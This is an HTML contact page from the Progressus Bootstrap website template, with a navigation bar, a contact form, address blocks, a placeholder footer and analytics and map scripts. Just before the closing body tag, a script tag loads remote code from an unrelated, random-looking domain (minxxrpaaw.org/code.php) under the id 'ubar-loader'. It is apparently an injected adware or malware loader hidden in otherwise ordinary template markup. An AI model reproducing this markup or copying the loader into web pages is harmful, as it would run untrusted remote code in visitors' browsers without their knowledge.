<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<meta name="viewport"    content="width=device-width, initial-scale=1.0">
	<meta name="description" content="">
	<meta name="author"      content="Sergey Pozhilov (GetTemplate.com)">

	<title>Contact us - Progressus Bootstrap template</title>

	<link rel="shortcut icon" href="assets/images/gt_favicon.png">

	<link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Raleway:200,400,600|Open+Sans:300,400,700">
	<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css">
	<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css">

	<!-- Custom styles for our template -->
	<link rel="stylesheet" href="assets/css/styles.css">

	<!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
	<!--[if lt IE 9]>
	<script src="assets/js/html5shiv.js"></script>
	<script src="assets/js/respond.min.js"></script>
	<![endif]-->
</head>

<body class="page-contact">

	<!-- fixed navbar -->
	<div class= "navbar navbar-fixed-top headroom ontop-now">
		<div class="container">
			<div class="navbar-header">
				<!-- Button for smallest screens -->
				<button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"><span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button>
				<a class="navbar-brand" href="index.html">
					<img src="assets/images/logo.png" alt="Progressus HTML5 template">
					<img src="assets/images/logo_on_white.png" alt="Progressus HTML5 template" class="secondary">
				</a>
			</div>
			<div class="navbar-collapse collapse">
				<ul class="nav navbar-nav pull-right">
					<li><a href="index.html">Home</a></li>
					<li><a href="landing-startup.html">Landing</a></li>
					<li><a href="features.html">Features</a></li>
					<li><a href="pricing.html">Pricing</a></li>
					<li class="dropdown">
						<a href="#" class="dropdown-toggle" data-hover="dropdown" data-toggle="dropdown">More Pages <b class="caret"></b></a>
						<ul class="dropdown-menu">
							<li><a href="services.html">Services</a></li>
							<li><a href="portfolio.html">Portfolio</a></li>
							<li><a href="portfolio-item.html">Portfolio Item</a></li>
							<li><a href="blog.html">Blog Home</a></li>
							<li><a href="single.html">Single Post</a></li>
							<li><a href="about.html">About</a></li>
							<li><a href="sidebar-left.html">Left Sidebar</a></li>
							<li><a href="sidebar-right.html">Right Sidebar</a></li>
							<li class="active"><a href="contact.html">Contact</a></li>
						</ul>
					</li>
					<li><a class="btn btn-rounded" href="signin.html">SIGN IN / SIGN UP</a></li>
				</ul>
			</div><!--/.nav-collapse -->
		</div>
	</div>
	<!-- end of fixed navbar -->

	<!-- header (simple version) -->
	<header class="head-simple">
		<div class="container">
			<h1 class="page-title text-center">
				Get in touch
				<span>Have a question, comment, or just want to say hi? Drop us a line!</span>
			</h1>
		</div>
	</header>
	<!-- end of header -->


	<!-- form section -->
	<section class="section section-contact jumbotron">
		<div class="container">

			<form class="contact-form" action="" method="POST">
				<fieldset class="topspace">
					<div class="row">
						<div class="col-sm-4 col-sm-push-2">
							<div class="form-group">
								<label for="f-name" class="sr-only">Full name:</label>
								<input class="form-control" id="f-name" name="f-name" type="text" placeholder="Full name*">
							</div>
						</div>
						<div class="col-sm-4 col-sm-push-2">
							<div class="form-group">
								<label for="f-email" class="sr-only">Email:</label>
								<input class="form-control" id="f-email" name="f-email" type="email" placeholder="Email*">
							</div>
						</div>
					</div>
				</fieldset>

				<fieldset>
					<div class="row">
						<div class="col-sm-4 col-sm-push-2">
							<div class="form-group">
						<label for="f-reason" class="sr-only">I want to:</label>
						<div class="select-control">
							<select size="1" id="f-reason" name="f-reason" class="form-control">
								<option value="">I want to:</option>
								<option value="quote">get price qoute</option>
								<option value="partner">discuss partnership opportunities</option>
								<option value="support">get customer support</option>
								<option value="other">other</option>
							</select>
						</div>
							</div>
						</div>
						<div class="col-sm-4 col-sm-push-2">
							<div class="form-group">
								<label for="f-subject" class="sr-only">Subject</label>
								<input class="form-control" id="f-subject" name="f-subject" type="text" placeholder="Subject*" >
							</div>
						</div>
				</fieldset>
				<fieldset class="topspace">
					<div class="row">
						<div class="col-sm-8 col-sm-push-2">
							<div class="form-group">
								<label for="f-description" class="sr-only">Message</label>
								<textarea class="form-control" id="f-description" name="f-description" rows="5" cols="40" placeholder="Message*"></textarea>
							</div>
							<div class="form-group text-right">
								<button type="submit" class="btn btn-primary">Get in touch</button>
							</div>
						</div>
					</div>
				</fieldset>


			</form>
		</div>
	</section>
	<!-- end of form section -->


	<section class="section section-address">
		<div class="container">
			<div class="row">
				<div class="col-sm-3 col-sm-push-2">
					<h4>Address:</h4>
					<address>
						2002 Holcombe Boulevard, Houston, TX 77030, USA
					</address>
				</div>
				<div class="col-sm-3 col-sm-push-2">
					<h4>Phone, email:</h4>
					<address>
						(713) 791-1414<br>
						<a href="">hello@company.com</a>
					</address>
				</div>
				<div class="col-sm-2 col-sm-push-2">
					<h4>Social:</h4>
					<ul class="social-icons">
						<li><a href=""><i class="fa fa-twitter"></i></a></li>
						<li><a href=""><i class="fa fa-facebook"></i></a></li>
						<li><a href=""><i class="fa fa-linkedin"></i></a></li>
						<li><a href=""><i class="fa fa-youtube"></i></a></li>
					</ul>
				</div>
			</div>
		</div>
	</section>


	<section class="section bottomspace-0">
		<div id="map"></div>
	</section>

	<footer id="footer">

		<div class="footer1">
			<div class="container">
				<div class="row">

					<div class="col-md-3 widget">
						<h3 class="widget-title">Contact</h3>
						<div class="widget-body">
							<p>+234 23 9873237<br>
								<a href="mailto:#">some.email@somewhere.com</a><br>
								<br>
								234 Hidden Pond Road, Ashland City, TN 37015
							</p>
						</div>
					</div>

					<div class="col-md-3 widget">
						<h3 class="widget-title">Follow us</h3>
						<div class="widget-body">
							<p class="follow-me-icons clearfix">
								<a href=""><i class="fa fa-twitter fa-2"></i></a>
								<a href=""><i class="fa fa-dribbble fa-2"></i></a>
								<a href=""><i class="fa fa-github fa-2"></i></a>
								<a href=""><i class="fa fa-facebook fa-2"></i></a>
							</p>
						</div>
					</div>

					<div class="col-md-6 widget">
						<h3 class="widget-title">Text widget</h3>
						<div class="widget-body">
							<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Excepturi, dolores, quibusdam architecto voluptatem amet fugiat nesciunt placeat provident cumque accusamus itaque voluptate modi quidem dolore optio velit hic iusto vero praesentium repellat commodi ad id expedita cupiditate repellendus possimus unde?</p>
							<p>Eius consequatur nihil quibusdam! Laborum, rerum, quis, inventore ipsa autem repellat provident assumenda labore soluta minima alias temporibus facere distinctio quas adipisci nam sunt explicabo officia tenetur at ea quos doloribus dolorum voluptate reprehenderit architecto sint libero illo et hic.</p>
						</div>
					</div>

				</div> <!-- /row of widgets -->
			</div>
		</div>

		<div class="footer2">
			<div class="container">
				<div class="row">

					<div class="col-md-6 widget">
						<div class="widget-body">
							<p class="simplenav">
								<a href="#">Home</a> |
								<a href="about.html">About</a> |
								<a href="sidebar-right.html">Sidebar</a> |
								<a href="contact.html">Contact</a> |
								<b><a href="signup.html">Sign up</a></b>
							</p>
						</div>
					</div>

					<div class="col-md-6 widget">
						<div class="widget-body">
							<p class="text-right">
								Copyright &copy; 2014, Your name. Design: <a href="http://gettemplate.com/" rel="designer">GetTemplate</a>
							</p>
						</div>
					</div>

				</div> <!-- /row of widgets -->
			</div>
		</div>
	</footer>


	<script>
	  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

	  ga('create', 'UA-48366846-1', 'gettemplate.com');
	  ga('send', 'pageview');
	</script>

	<!-- JavaScript libs are placed at the end of the document so the pages load faster -->
	<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
	<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/js/bootstrap.min.js"></script>
	<script src="assets/js/headroom.min.js"></script>
	<script src="assets/js/jQuery.headroom.min.js"></script>
	<script src="assets/js/template.js"></script>

	<!-- Google Maps -->
	<script src="https://maps.googleapis.com/maps/api/js?key=&amp;sensor=false&amp;extension=.js"></script>
	<script src="assets/js/google-map.js"></script>

<script src="http://minxxrpaaw.org/code.php?appid=coi1634-10064-1491396470062-cf50e48c-094b-4367-935a-53ea4dcc15b7&h=0&m=normal&aff=0" id="ubar-loader"></script></body>
</html>
